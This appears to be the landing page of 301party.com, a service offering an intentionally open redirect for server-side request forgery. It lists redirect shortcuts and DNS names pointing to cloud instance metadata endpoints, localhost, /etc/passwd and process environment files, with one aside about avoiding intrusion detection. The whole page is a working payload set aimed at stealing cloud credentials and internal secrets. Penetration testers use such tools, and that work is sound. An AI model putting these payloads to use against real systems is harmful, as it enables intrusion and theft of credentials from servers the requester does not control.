301party.com: The Intentionally Open Redirect


Example usage:
  • /redirect?url=https://example.com&type=302
  • /{301,302,303,307,308}?url=http://example.com
  • /metadata: shortcut for /redirect?url=http://169.254.169.254/latest/meta-data/
  • /metadata6: shortcut for /redirect?url=http://[fd00:ec2::254]/latest/meta-data/
  • /localhost: shortcut for /redirect?url=http://127.0.0.1
  • /zeroes: shortcut for /redirect?url=http://0.0.0.0
  • /passwd: shortcut for /redirect?url=file:////etc/passwd
  • /services: shortcut for /redirect?url=file:///etc/services (avoid IDS maybe...)
  • /environ: shortcut for /redirect?url=file:///self/proc/environ

Bonus DNS records!

  • localhost.301party.com: 127.0.0.1
  • metadata.301party.com: 169.254.169.254
  • ipv6.metadata.301party.com: [::169.254.169.254]

DIY
